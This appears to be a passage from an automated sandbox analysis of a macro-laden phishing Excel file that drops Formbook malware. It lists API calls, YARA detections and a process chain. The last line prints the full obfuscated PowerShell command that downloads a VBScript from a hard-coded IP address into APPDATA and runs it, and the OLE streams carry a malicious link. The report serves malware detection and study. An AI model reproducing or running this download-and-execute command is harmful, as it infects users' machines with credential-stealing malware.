              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A71D80 NtSuspendThread,27_2_00A71D80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FD8C NtDelayExecution,27_2_00A6FD8C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FD5C NtEnumerateKey,27_2_00A6FD5C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FEA0 NtReadVirtualMemory,27_2_00A6FEA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FED0 NtAdjustPrivilegesToken,27_2_00A6FED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FE24 NtWriteVirtualMemory,27_2_00A6FE24
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FFB4 NtCreateSection,27_2_00A6FFB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FFFC NtCreateProcessEx,27_2_00A6FFFC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A6FF34 NtQueueApcThread,27_2_00A6FF34
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89AA34CE8_2_000007FE89AA34CE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89AA6FBE8_2_000007FE89AA6FBE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040197827_2_00401978
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040306027_2_00403060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004011F027_2_004011F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0042EAF327_2_0042EAF3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040239E27_2_0040239E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004023A027_2_004023A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040FC6A27_2_0040FC6A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040FC7327_2_0040FC73
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00402C1127_2_00402C11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041662327_2_00416623
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041662227_2_00416622
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040FE9327_2_0040FE93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040DF1327_2_0040DF13
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004027C027_2_004027C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004027BC27_2_004027BC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7E0C627_2_00A7E0C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7E2E927_2_00A7E2E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B263BF27_2_00B263BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AA63DB27_2_00AA63DB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8230527_2_00A82305
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00ACA37B27_2_00ACA37B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0443E27_2_00B0443E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B005E327_2_00B005E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A9C5F027_2_00A9C5F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AC654027_2_00AC6540
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8468027_2_00A84680
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8E6C127_2_00A8E6C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B2262227_2_00B22622
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00ACA63427_2_00ACA634
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8C7BC27_2_00A8C7BC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AA286D27_2_00AA286D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8C85C27_2_00A8C85C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A829B227_2_00A829B2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B2098E27_2_00B2098E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B149F527_2_00B149F5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A969FE27_2_00A969FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00ACC92027_2_00ACC920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B2CBA427_2_00B2CBA4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B06BCB27_2_00B06BCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B22C9C27_2_00B22C9C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0AC5E27_2_00B0AC5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AB0D3B27_2_00AB0D3B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8CD5B27_2_00A8CD5B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AB2E2F27_2_00AB2E2F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A9EE4C27_2_00A9EE4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B1CFB127_2_00B1CFB1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AF2FDC27_2_00AF2FDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A90F3F27_2_00A90F3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AAD00527_2_00AAD005
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AFD06D27_2_00AFD06D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8304027_2_00A83040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A9905A27_2_00A9905A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0D13F27_2_00B0D13F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B2123827_2_00B21238
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7F3CF27_2_00A7F3CF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8735327_2_00A87353
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A9148927_2_00A91489
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AB548527_2_00AB5485
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00ABD47D27_2_00ABD47D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B235DA27_2_00B235DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A8351F27_2_00A8351F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0579A27_2_00B0579A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AB57C327_2_00AB57C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B1771D27_2_00B1771D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B1F8EE27_2_00B1F8EE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AFF8C427_2_00AFF8C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0595527_2_00B05955
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0394B27_2_00B0394B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B33A8327_2_00B33A83
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0DBDA27_2_00B0DBDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7FBD727_2_00A7FBD7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AA7B0027_2_00AA7B00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B1FDDD27_2_00B1FDDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00B0BF1427_2_00B0BF14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00AADF7C27_2_00AADF7C
              Source: PO#BBGR2411PO69.xlsOLE indicator, VBA macros: true
              Source: 09230000.0.drOLE indicator, VBA macros: true
              Source: PO#BBGR2411PO69.xlsStream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
              Source: 09230000.0.drStream path 'MBD007009DC/\x1Ole' : https://linkjago.me/RHCYXp?&damage=nasty &briefs=momentous&highlight=delicious&middleman=magenta&spankE(A+CFT5i!Y0cPBGlxDbP6MnI5*<OzfDTjcjZj9KlFjg0moZTAleAHFRL4t3bpRDluPm3zaP7HzlmDSjESavhbsM9KXzyJuhmq2bYTjtubWGqYHE98z2enDU0Y6P1shcJeXMMPegTWHieCzdEcNssRywsQR07ZfjSuSrnpZxSRuvb6NAoactyurh6FsufMg2oT66wMrco6iNu7ZSguG3eLrlSEfslw0XSJI0we6q7Zf7ksjm1ugtNf7L28dBapn5dumfkruiC4PaHeEoT0hNcZwUWtW1tn]MBRO25
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A7E2A8 appears 60 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A7DF5C appears 137 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AEF970 appears 84 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AC373B appears 253 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AC3F92 appears 132 times
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.phis.troj.expl.evad.winXLS@31/36@11/4
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\09230000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8796.tmpJump to behavior
              Source: PO#BBGR2411PO69.xlsOLE indicator, Workbook stream: true
              Source: 09230000.0.drOLE indicator, Workbook stream: true
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3...................... .y.............Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................^k....}..w.... .y.....\.......................(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................^k....}..w.... .y.....\.......................(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..?T.....&.^k......S.....(.P.....................x....... .......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....................x.......8.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........x.......F.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .y.....}..w.............?T.....&.^k......S.....(.P.............................l.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ....... .y.....}..w.............?T.....&.^k......S.....(.P.....................x...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................ .y.............0........Wl.....}..w............@E......^...............(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................ .y......................Wl.....}..w............@E......^...............(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....p.......................p.......x........................3......................p...............Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P..... .......X.......................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................<..............
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................-).l....}..w.....<......\.......................(.P.....................8...............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................-).l....}..w.....<......\.......................(.P.....................8...............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.(.^......(.l.....s......(.P............................. .......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................<......}..w............(.^......(.l.....s......(.P.....................................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................<......}..w............(.^......(.l.....s......(.P.............................l.......................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........<......}..w............(.^......(.l.....s......(.P.....................................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................<..............0. ......Wl.....}..w....8.......@E......^...............(.P.....................................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................<.......................Wl.....}..w....8.......@E......^...............(.P.....................................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m..............................................................3......................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P............. .......................................
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: PO#BBGR2411PO69.xlsVirustotal: Detection: 7%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
